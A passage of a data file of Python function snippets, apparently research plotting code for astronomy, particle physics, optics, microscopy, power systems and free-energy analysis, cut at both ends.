data.timestamps[0].strftime('%y-%j-%H%M%S') + '.pdf'\n completename = os.path.join(destination+addendum,outplotname)\n plt.savefig(completename, bboxinches='tight')\n plt.clf()\n\n outplotname = 'Plot ' + str(len(os.listdir(destination+'rawdata\\\\'+addendum)) + 1)+ ' ' + data.timestamps[0].strftime('%y-%j-%H%M%S') + ' rawdata.csv'\n completename1 = os.path.join(destination+'rawdata\\\\'+addendum,outplotname)\n generateDataFile(data.rawdata,completename1)\n\n print \"Done generating plot...\"", "def apolco(a,minfeh=-3,out=None) :\n apo=np.where((a['TELESCOPE'] == 'apo25m') & (a['RV_FEH']>minfeh) )[0]\n fig=vscat(a[apo],marker='o',density=True)\n lco=np.where((a['TELESCOPE'] == 'lco25m') & (a['RV_FEH']>minfeh) )[0]\n vscat(a[lco],fig=fig,ls=':',marker='+',density=True)\n if out is not None : \n fig[0].savefig(out+'_1.png')\n plt.close()\n i1,i2=match.match(a['APOGEE_ID'][apo],a['APOGEE_ID'][lco])\n print('matched {:d} stars'.format(len(i1)))\n fig,ax=plots.multi(1,2)\n #plots.plotp(ax[0,0],a['SNR'][apo[i1]],a['VHELIO_AVG'][apo[i1]]-a['VHELIO_AVG'][lco[i2]],yr=[-3,3],yt=r'$\\Delta$ VHELIO_AVG',xt='S/N')\n #plots.plotp(ax[0,1],a['SNR'][apo[i1]],a['VHELIO_AVG'][apo[i1]]-a['VHELIO_AVG'][lco[i2]],yr=[-50,50],yt=r'$\\Delta$ VHELIO_AVG',xt='S/N')\n #plots.plotp(ax[1,0],a['SNR'][apo[i1]],a['VSCATTER'][apo[i1]]-a['VSCATTER'][lco[i2]],yr=[-0.5,0.5],yt=r'$\\Delta$ VSCATTER',xt='S/N')\n #plots.plotp(ax[1,1],a['SNR'][apo[i1]],a['VSCATTER'][apo[i1]]-a['VSCATTER'][lco[i2]],yr=[-5,5],yt=r'$\\Delta$ VSCATTER',xt='S/N')\n ax[0].hist(a['VHELIO_AVG'][apo[i1]]-a['VHELIO_AVG'][lco[i2]],bins=np.arange(-0.5,0.5,0.02),histtype='step')\n ax[0].set_xlabel(r'$\\Delta$ VHELIO_AVG')\n ax[1].hist(a['VSCATTER'][apo[i1]]-a['VSCATTER'][lco[i2]],bins=np.arange(-0.25,0.25,0.01),histtype='step')\n ax[1].set_xlabel(r'$\\Delta$ VSCATTER')\n if out is not None : \n fig.savefig(out+'_2.png')\n plt.close()", "def plot_ENR_spectra(bolo_name, mass, analysis_type): \n\n\t#Load cut value on BDT output\n\tcut_val = 0 \n\twith open (\"./Text_files/\" + bolo_name + \"_BDT_cut_and_eff_\" + analysis_type + \".txt\", \"r\") as fcut:\n\t\tstuff = [elem.rstrip().split(\",\") for elem in fcut.readlines()]\n\t\tfor elem in stuff:\n\t\t\tmass_val = elem[0]\n\t\t\tif int(mass) ==int(mass_val):\n\t\t\t\tcut_val = float(elem[1])\n\t\n\tWIMP_gen_path = \"/home/irfulx204/mnt/tmain/Desktop/Run308_BDT_simu_corr/BDT_\" + bolo_name + \"/\" + analysis_type +\"/WIMP/ROOT_files/\"\n\tApplication_path = 
\"/home/irfulx204/mnt/tmain/Desktop/Run308_BDT_simu_corr/BDT_\" + bolo_name + \"/\" + analysis_type +\"/Application/\"\n\t\n\t#Load the WIMP trees\n\ttnocut, fnocut = PyRPl.open_ROOT_object(WIMP_gen_path + bolo_name + \"_WIMP_mass_\" + mass + \"_tree.root\", \"t_newnocut1\")\n\ttcut, fcut = PyRPl.open_ROOT_object(WIMP_gen_path + bolo_name + \"_WIMP_mass_\" + mass + \"_tree.root\", \"t_new1\")\n\ttBDTcut, fBDTcut = PyRPl.open_ROOT_object(Application_path + \"WIMP\" + \"_mass_\" + str(mass) + \"_tree.root\", \"tout\")\n\n\ttBDTcut.AddFriend(tcut)\n\t# tBDTcut.Draw(\"tout.NN:t_new1.ENR>>hist(100,2,8, 100,-2,2)\")\n\t# raw_input()\n\n\thWIMPnocut = TH1F(\"hWIMPnocut\", \"hWIMPnocut\", 100, 0, 15)\n\thWIMPcut = TH1F(\"hWIMPcut\", \"hWIMPcut\", 100, 0, 15)\n\thWIMPBDTcut = TH1F(\"hWIMPBDTcut\", \"hWIMPBDTcut\", 100, 0, 15)\n\n\ttnocut.Project(\"hWIMPnocut\", \"ENR\")\n\ttcut.Project(\"hWIMPcut\", \"ENR\")\n\ttBDTcut.Project(\"hWIMPBDTcut\", \"t_new1.ENR\", \"tout.NN>\" + str(cut_val))\n\n\n\tPyRPl.process_TH1(hWIMPnocut, X_title = \"ENR (keV)\", Y_title = \"Efficiency\", color = kBlack)\n\tPyRPl.process_TH1(hWIMPcut, X_title = \"ENR (keV)\", Y_title = \"Efficiency\", color = kRed)\n\tPyRPl.process_TH1(hWIMPBDTcut, X_title = \"ENR (keV)\", Y_title = \"Efficiency\", color = kBlue)\n\n\t#Set bin errors\n\tlist_hist = [hWIMPnocut, hWIMPcut, hWIMPBDTcut]\n\tfor h in list_hist:\n\t\tfor i in range(1,101):\n\t\t\th.SetBinError(i, TMath.Sqrt(h.GetBinContent(i)))\n\n\t# #Plot histograms as a check\n\t# hWIMPnocut.Draw(\"\")\t\n\t# hWIMPcut.Draw(\"same\")\t\n\t# hWIMPBDTcut.Draw(\"same\")\n\n\t# raw_input()\n\n\t# plot the efficiency functions\n\t# hWIMPcut.Divide(hWIMPnocut)\t\n\t# hWIMPBDTcut.Divide(hWIMPnocut)\t\n\t# hWIMPBDTcut.SetMarkerStyle(1)\n\t# hWIMPcut.SetMarkerStyle(1)\n\t# hWIMPcut.SetMinimum(0)\n\t# hWIMPcut.SetMaximum(1.5)\n\t# hWIMPcut.Draw(\"E1\")\t\n\t# hWIMPBDTcut.Draw(\"E1same\")\n\t\n\t# leg = TLegend(0.1934673,0.5813953,0.5037688,0.7043189,\"\",\"brNDC\")\n\t# leg.AddEntry(hWIMPcut.GetName(), \"Pre selection cut\", \"leg\")\n\t# leg.AddEntry(hWIMPBDTcut.GetName(),\"BDT cut\" ,\"leg\")\n\t# leg.SetFillColor(kWhite)\n\t# leg.SetBorderSize(0)\n\t# leg.Draw(\"same\")\n\n\tteff1 = TEfficiency(hWIMPcut, hWIMPnocut)\n\tteff2 = TEfficiency(hWIMPBDTcut, hWIMPnocut)\n\n\n\tteff1.SetName(\"teff1\")\n\tteff2.SetName(\"teff2\")\n\n\tteff1.SetLineColor(kRed)\n\tteff1.Draw()\n\tteff2.Draw(\"same\")\n\n\tleg = TLegend(0.1934673,0.5813953,0.5037688,0.7043189,\"\",\"brNDC\")\n\tleg.AddEntry(teff1.GetName(), \"Pre selection cut\", \"leg\")\n\tleg.AddEntry(teff2.GetName(),\"Pre selection + BDT cut\" ,\"leg\")\n\tleg.SetFillColor(kWhite)\n\tleg.SetBorderSize(0)\n\tleg.Draw(\"same\")\n\t\n\traw_input()\n\n\n\tc1.Print(\"./Figures/\" + bolo_name + \"_efficiency_mass_\" + str(mass) + \"_baseline_time.eps\")", "def plot_omni_quicklook(self, flux_opts=None, eflux_opts=None,\n hflux_opts=None, oflux_opts=None):\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n \n fig=plt.figure(figsize=(11,7))\n fig.subplots_adjust(left=0.07, right=0.99, bottom=0.19, \n top=0.94, wspace=0.4, hspace=0.25)\n gs=gridspec.GridSpec(3,3)\n\n # Do orbits first.\n a1=fig.add_subplot(gs[0,0])\n a2=fig.add_subplot(gs[1,0])\n a3=fig.add_subplot(gs[2,0])\n self.add_orbit_plot('XY', target=a1)\n self.add_orbit_plot('XZ', target=a2)\n self.add_orbit_plot('YZ', target=a3)\n\n # Add fluxes.\n a1=fig.add_subplot(gs[0,1:])\n a2=fig.add_subplot(gs[1,1:])\n a3=fig.add_subplot(gs[2,1:])\n if eflux_opts is None:\n 
eflux_opts = {}\n if hflux_opts is None:\n hflux_opts = {}\n if oflux_opts is None:\n oflux_opts = {}\n if flux_opts is None:\n flux_opts = {}\n for k in flux_opts:\n for d in (eflux_opts, hflux_opts, oflux_opts):\n if not k in d:\n d[k] = flux_opts[k]\n self.add_omniflux_plot('omnie', target=a1, no_xlabels=True,\n **eflux_opts)\n self.add_omniflux_plot('omniH', target=a2, no_xlabels=True,\n **hflux_opts)\n self.add_omniflux_plot('omniO', target=a3, do_orbticks=True,\n **oflux_opts)\n \n return fig", "def plot(self):\n\t\tself.plotOfSpect()", "def test4():\n\t\n\tprint('This takes a while to compute - be patient!')\n\t\n\td = np.linspace(-15000,15000,300)\n\t#Voigt\n\t#p_dict = {'Bfield':700,'rb85frac':1,'Btheta':90*np.pi/180,'lcell':75e-3,'T':84,'Dline':'D2','Elem':'Cs'}\n\tp_dict = {'Bfield':1000,'rb85frac':1,'Btheta':88*np.pi/180,'Bphi':00*np.pi/180,'lcell':75e-3,'T':93,'Dline':'D2','Elem':'Cs'}\n\tpol = np.array([1.0,0.0,0.0])\n\tTVx = get_spectra(d,pol,p_dict,outputs=['I_M45','I_P45','Ix','Iy','S0','Iz'])\n\t\n\tfig2 = plt.figure()\n\tax1a = fig2.add_subplot(411)\n\tax2a = fig2.add_subplot(412,sharex=ax1a)\n\tax3a = fig2.add_subplot(413,sharex=ax1a)\n\tax4a = fig2.add_subplot(414,sharex=ax1a)\n\t\n\tax1a.plot(d,TVx[0],'r',lw=2,label=r'$I_{-45}$')\n\tax2a.plot(d,TVx[1],'b',lw=2,label=r'$I_{+45}$')\n\tax3a.plot(d,TVx[2],'r',lw=2,label=r'$I_x$')\n\tax4a.plot(d,TVx[3],'b',lw=2,label=r'$I_y$')\n\tax4a.plot(d,TVx[0]+TVx[1],'r:',lw=3.5,label=r'$I_{+45}+I_{-45}$')\n\tax4a.plot(d,TVx[2]+TVx[3],'k:',lw=2.5,label=r'$I_x + I_y$')\n\tax4a.plot(d,TVx[4],'g--',lw=1.5,label='$S_0$')\n#\tax4a.plot(d,TVx[5],'c--',lw=2.5,label='$I_z$')\n\t\n\t\n\tax4a.set_xlabel('Detuning (MHz)')\n\tax1a.set_ylabel('I -45')\n\tax2a.set_ylabel('I +45')\n\tax3a.set_ylabel('Ix')\n\tax4a.set_ylabel('Iy')\n\t\n\tax4a.set_xlim(d[0],d[-1]+3000)\n\tax4a.legend(loc=0)\n\t\n\tplt.show()", "def plot(self):\n\t\t\t\n\t\tfig,p1=_plt.subplots(4,sharex=True)\n\t\tp1[0].plot(self.time*1e3,self.eRogA,label='Rogowski A')\n\t\tp1[1].plot(self.time*1e3,self.eRogB,label='Rogowski B')\n\t\tp1[2].plot(self.time*1e3,self.eRogC,label='Rogowski C')\n\t\tp1[3].plot(self.time*1e3,self.eRogD,label='Rogowski D')\n\t\t_plot.finalizeSubplot(p1,xlabel='Time (ms)',ylabel='Current (A)')\n\t\t_plot.finalizeFigure(fig,title=self.title)\n\t\t\n\t\treturn p1", "def plot_reconstruction_diagnostics(self, figsize=(20, 10)):\n figs = []\n fig_names = []\n\n # upsampled frequency\n fx_us = tools.get_fft_frqs(2 * self.nx, 0.5 * self.dx)\n fy_us = tools.get_fft_frqs(2 * self.ny, 0.5 * self.dx)\n\n # plot different stages of inversion\n extent = tools.get_extent(self.fy, self.fx)\n extent_upsampled = tools.get_extent(fy_us, fx_us)\n\n for ii in range(self.nangles):\n fig = plt.figure(figsize=figsize)\n grid = plt.GridSpec(3, 4)\n\n for jj in range(self.nphases):\n\n # ####################\n # separated components\n # ####################\n ax = plt.subplot(grid[jj, 0])\n\n to_plot = np.abs(self.separated_components_ft[ii, jj])\n to_plot[to_plot <= 0] = np.nan\n plt.imshow(to_plot, norm=LogNorm(), extent=extent)\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 0:\n plt.title('O(f)otf(f)')\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj == 1:\n plt.title('m*O(f-fo)otf(f)')\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj 
== 2:\n plt.title('m*O(f+fo)otf(f)')\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n # ####################\n # deconvolved component\n # ####################\n ax = plt.subplot(grid[jj, 1])\n\n plt.imshow(np.abs(self.components_deconvolved_ft[ii, jj]), norm=LogNorm(), extent=extent)\n\n if jj == 0:\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj == 1:\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj == 2:\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 0:\n plt.title('deconvolved component')\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n # ####################\n # shifted component\n # ####################\n ax = plt.subplot(grid[jj, 2])\n\n # avoid any zeros for LogNorm()\n cs_ft_toplot = np.abs(self.components_shifted_ft[ii, jj])\n cs_ft_toplot[cs_ft_toplot <= 0] = np.nan\n plt.imshow(cs_ft_toplot, norm=LogNorm(), extent=extent_upsampled)\n plt.scatter(0, 0, edgecolor='r', facecolor='none')\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 1:\n circ2 = matplotlib.patches.Circle(-self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n elif jj == 2:\n circ2 = matplotlib.patches.Circle(self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n if jj == 0:\n plt.title('shifted component')\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n # ####################\n # normalized weights\n # ####################\n ax = plt.subplot(grid[jj, 3])\n\n to_plot = self.weights[ii, jj] / self.weight_norm\n to_plot[to_plot <= 0] = np.nan\n im2 = plt.imshow(to_plot, norm=LogNorm(), extent=extent_upsampled)\n im2.set_clim([1e-5, 1])\n fig.colorbar(im2)\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 1:\n circ2 = matplotlib.patches.Circle(-self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n elif jj == 2:\n circ2 = matplotlib.patches.Circle(self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n if jj == 0:\n plt.title('normalized weight')\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n plt.suptitle('period=%0.3fnm at %0.3fdeg=%0.3frad, f=(%0.3f,%0.3f) 1/um\\n'\n 'mod=%0.3f, min mcnr=%0.3f, wiener param=%0.2f\\n'\n 'phases (deg) =%0.2f, %0.2f, %0.2f, phase diffs (deg) =%0.2f, %0.2f, %0.2f' %\n (self.periods[ii] * 1e3, self.angles[ii] * 180 / np.pi, self.angles[ii],\n self.frqs[ii, 0], self.frqs[ii, 1], self.mod_depths[ii, 1], np.min(self.mcnr[ii]), 
self.wiener_parameter,\n self.phases[ii, 0] * 180/np.pi, self.phases[ii, 1] * 180/np.pi, self.phases[ii, 2] * 180/np.pi,\n 0, np.mod(self.phases[ii, 1] - self.phases[ii, 0], 2*np.pi) * 180/np.pi,\n np.mod(self.phases[ii, 2] - self.phases[ii, 0], 2*np.pi) * 180/np.pi))\n\n figs.append(fig)\n fig_names.append('sim_combining_angle=%d' % (ii + 1))\n\n # #######################\n # net weight\n # #######################\n figh = plt.figure(figsize=figsize)\n grid = plt.GridSpec(1, 2)\n plt.suptitle('Net weight, Wiener param = %0.2f' % self.wiener_parameter)\n\n ax = plt.subplot(grid[0, 0])\n net_weight = np.sum(self.weights, axis=(0, 1)) / self.weight_norm\n im = ax.imshow(net_weight, extent=extent_upsampled, norm=PowerNorm(gamma=0.1))\n\n figh.colorbar(im, ticks=[1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 1e-2, 1e-3, 1e-4, 1e-5])\n\n ax.set_title(\"non-linear scale\")\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n circ2 = matplotlib.patches.Circle((0, 0), radius=2*self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n circ3 = matplotlib.patches.Circle(self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ3)\n\n circ4 = matplotlib.patches.Circle(-self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ4)\n\n circ5 = matplotlib.patches.Circle(self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ5)\n\n circ6 = matplotlib.patches.Circle(-self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ6)\n\n circ7 = matplotlib.patches.Circle(self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ7)\n\n circ8 = matplotlib.patches.Circle(-self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ8)\n\n ax.set_xlim([-2 * self.fmax, 2 * self.fmax])\n ax.set_ylim([2 * self.fmax, -2 * self.fmax])\n\n ax = plt.subplot(grid[0, 1])\n ax.set_title(\"linear scale\")\n im = ax.imshow(net_weight, extent=extent_upsampled)\n\n figh.colorbar(im)\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n circ2 = matplotlib.patches.Circle((0, 0), radius=2 * self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n circ3 = matplotlib.patches.Circle(self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ3)\n\n circ4 = matplotlib.patches.Circle(-self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ4)\n\n circ5 = matplotlib.patches.Circle(self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ5)\n\n circ6 = matplotlib.patches.Circle(-self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ6)\n\n circ7 = matplotlib.patches.Circle(self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ7)\n\n circ8 = matplotlib.patches.Circle(-self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ8)\n\n ax.set_xlim([-2 * self.fmax, 2 * self.fmax])\n ax.set_ylim([2 * self.fmax, -2 * self.fmax])\n\n figs.append(figh)\n fig_names.append('net_weight')\n\n return figs, fig_names", "def app(ngr=100,c2a=1.6235):\n import matplotlib.pyplot as plt\n\n ## small donuts\n # plt.gcf().clf()\n grs = main(mu=0,ngrains=ngr,tilt_1=30.,sigma=15)\n plt.gcf().savefig('small_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='sm_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## Big donuts\n grs = 
main(mu=0,ngrains=ngr,tilt_1=50.,sigma=15)\n plt.gcf().savefig('big_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='big_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (30).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=30.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-30.,sigma=45)\n plt.gcf().clf()\n grs =[]\n for i in range(len(gr1)):\n grs.append(gr1[i])\n grs.append(gr2[i])\n grs=np.array(grs)\n mypf=upf.polefigure(grains=grs,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t30.pdf',bbox_inches='tight')\n f = gen_file(lab='dbl_lets_30',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (50).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=50.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-50.,sigma=45)\n plt.gcf().clf()\n gr =[]\n for i in range(len(gr1)):\n gr.append(gr1[i])\n gr.append(gr2[i])\n gr=np.array(gr)\n mypf=upf.polefigure(grains=gr,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t50.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='dbl_lets_50',ngr=ngr)\n write_gr(f,gr)", "def sysPLQF(mirror, blkFlag=True):\n import matplotlib.pyplot as plt\n import numpy as np # to ndarray.flatten ax\n\n mir = mirror\n xend = max(mir.r_t)\n\n fig, ax = plt.subplots(nrows=2, ncols=2,)\n ax = np.ndarray.flatten(ax)\n ax[0].set_title('Real Power Generated')\n for mach in mir.Machines:\n ax[0].plot(mir.r_t, mach.r_Pe, \n marker = 10,\n fillstyle='none',\n #linestyle = ':',\n label = 'Pe Gen '+ mach.Busnam)\n ax[0].set_xlabel('Time [sec]')\n ax[0].set_ylabel('MW')\n\n ax[2].set_title('Reactive Power Generated')\n for mach in mir.Machines:\n ax[2].plot(mir.r_t, mach.r_Q, \n marker = 10,\n fillstyle='none',\n #linestyle = ':',\n label = 'Q Gen '+ mach.Busnam)\n ax[2].set_xlabel('Time [sec]')\n ax[2].set_ylabel('MVAR')\n\n ax[1].set_title('Total System P Loading')\n ax[1].plot(mir.r_t, mir.r_ss_Pload, \n marker = 11,\n #fillstyle='none',\n #linestyle = ':',\n label = 'Pload')\n ax[1].set_xlabel('Time [sec]')\n ax[1].set_ylabel('MW')\n\n ax[3].set_title('System Mean Frequency')\n ax[3].plot(mir.r_t, mir.r_f,\n marker = '.',\n #linestyle = ':',\n label = r'System Frequency')\n ax[3].set_xlabel('Time [sec]')\n ax[3].set_ylabel('Frequency [PU]')\n\n # Global Plot settings\n for x in np.ndarray.flatten(ax):\n x.set_xlim(0,xend)\n x.legend()\n x.grid(True)\n\n fig.tight_layout()\n\n plt.show(block = blkFlag)", "def plot_ave(pulse, trap, ToP):\n time_array = np.linspace(0, pulse.t * trap.N, trap.N + 1)\n # fig, ax = plt.subplots()\n all_trial_n, all_trial_n_ave = trap.sideband_cool_sch(pulse, ave = True)\n if ToP == 'a':\n plt.plot(time_array * 1e3, all_trial_n_ave, label = pulse.t)\n if ToP == 'b':\n plt.plot(time_array * 1e3, all_trial_n_ave, color = 'magenta', linewidth = 3, label = 'Monte Carlo')\n if ToP == 'c':\n plt.plot(time_array * 1e3, all_trial_n_ave, color = 'b')\n if ToP == 'd':\n if trap.no_decay == True and trap.off_resonant_excite == False:\n plt.plot(time_array * 1e3, all_trial_n_ave, label = 'Decay to carrier')\n if trap.no_decay == False and trap.off_resonant_excite == False:\n plt.plot(time_array * 1e3, all_trial_n_ave, \n label = 'Decay to %s sideband'%(trap.sideband))\n if trap.no_decay == False and trap.off_resonant_excite == True:\n plt.plot(time_array * 1e3, all_trial_n_ave, \n label = 'Decay to %s sideband, off-resonant 
excite'%(trap.sideband))\n # plt.xlabel('time / ms')\n # plt.ylabel('Phonon State')\n # plt.legend()", "def plot_proof_functions():\n\n def thm1_D(x):\n return abs(1 / (2 + x) - 3 / (5 + x)) + abs(1 / (2 + x) - 2 / (5 + x))\n\n def thm2_D(x):\n return abs(2 / (2 + x) - (1 / 2) / ((1 / 2) + x))\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 2, 1000)\n\n plt.plot(x, thm1_D(x))\n plt.xlim(0, 2)\n plt.ylim(0.15, 0.22)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 6, 0, 2, linestyles='dashed', colors='grey', alpha=0.5)\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm1_D.pdf', bbox_inches='tight')\n plt.xticks(range(3), range(3))\n plt.close()\n\n print(f'Saved plot to: plots/thm1_D.pdf')\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 5, 1000)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 3, 0, 5, linestyles='dashed', colors='grey', alpha=0.5)\n plt.plot(x, thm2_D(x))\n plt.xlim(0, 5)\n plt.ylim(0, 0.4)\n plt.xticks(range(6), range(6))\n\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm2_D.pdf', bbox_inches='tight')\n plt.close()\n\n print(f'Saved plot to: plots/thm2_D.pdf')", "def plotTI():\n min_dl = dlam[dlam != 0].min()\n S = int(0.4/min_dl)\n fig = pl.figure(figsize = (8,6))\n ax = fig.add_subplot(1,1,1)\n ax.spines['bottom'].set_position('zero')\n ax.spines['top'].set_color('none')\n ax.spines['right'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n for k, spine in ax.spines.items():\n spine.set_zorder(12.2)\n\n xs, ndx, dx = [0], 0, 0.001\n colors = ['r', 'g', '#7F38EC', '#9F000F', 'b', 'y']\n min_y, max_y = 0, 0\n\n lines = tuple()\n ## lv_names2 = [r'$Coulomb$', r'$vdWaals$'] ## for the paper\n lv_names2 = []\n for j in range(n_components):\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n lv_names2.append(r'$%s$' % P.lv_names[j].capitalize())\n\n for j in range(n_components):\n\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n\n # Get the coordinates.\n lj = lchange[:,j]\n x = lv[:,j][lj]\n y = y[lj]/P.beta_report\n\n if 'TI' in P.methods:\n # Plot the TI integration area.\n ss = 'TI'\n for i in range(len(x)-1):\n min_y = min(y.min(), min_y)\n max_y = max(y.max(), max_y)\n #pl.plot(x,y)\n if i%2==0:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=0.5)\n xlegend = [-100*wnum for wnum in range(len(lv_names2))]\n pl.plot(xlegend, [0*wnum for wnum in xlegend], ls='-', color=colors[ndx], label=lv_names2[ndx]) ## for the paper\n\n if 'TI-CUBIC' in P.methods and not cubspl[j]==0:\n # Plot the TI-CUBIC interpolation curve.\n ss += ' and TI-CUBIC'\n xnew = numpy.arange(0, 1+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n pl.plot(xnew+ndx, ynew, color='#B6B6B4', ls ='-', solid_capstyle='round', lw=3.0)\n\n else:\n # Plot the TI-CUBIC integration area.\n ss = 'TI-CUBIC'\n for i in range(len(x)-1):\n xnew = numpy.arange(x[i], x[i+1]+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n ynew[0], ynew[-1] = y[i], y[i+1]\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n if i%2==0:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=0.5)\n\n # Store the abscissa values and update the subplot index.\n xs += (x+ndx).tolist()[1:]\n ndx += 1\n\n # Make 
sure the tick labels are not overcrowded.\n xs = numpy.array(xs)\n dl_mat = numpy.array([xs-i for i in xs])\n ri = range(len(xs))\n\n def getInd(r=ri, z=[0]):\n primo = r[0]\n min_dl=ndx*0.02*2**(primo>10)\n if dl_mat[primo].max()<min_dl:\n return z\n for i in r:\n for j in range(len(xs)):\n if dl_mat[i,j]>min_dl:\n z.append(j)\n return getInd(ri[j:], z)\n\n xt = [i if (i in getInd()) else '' for i in range(K)]\n pl.xticks(xs[1:], xt[1:], fontsize=10)\n pl.yticks(fontsize=10)\n #ax = pl.gca()\n #for label in ax.get_xticklabels():\n # label.set_bbox(dict(fc='w', ec='None', alpha=0.5))\n\n # Remove the abscissa ticks and set up the axes limits.\n for tick in ax.get_xticklines():\n tick.set_visible(False)\n pl.xlim(0, ndx)\n min_y *= 1.01\n max_y *= 1.01\n pl.ylim(min_y, max_y)\n\n for i,j in zip(xs[1:], xt[1:]):\n pl.annotate(('%.2f' % (i-1.0 if i>1.0 else i) if not j=='' else ''), xy=(i, 0), xytext=(i, 0.01), size=10, rotation=90, textcoords=('data', 'axes fraction'), va='bottom', ha='center', color='#151B54')\n if ndx>1:\n lenticks = 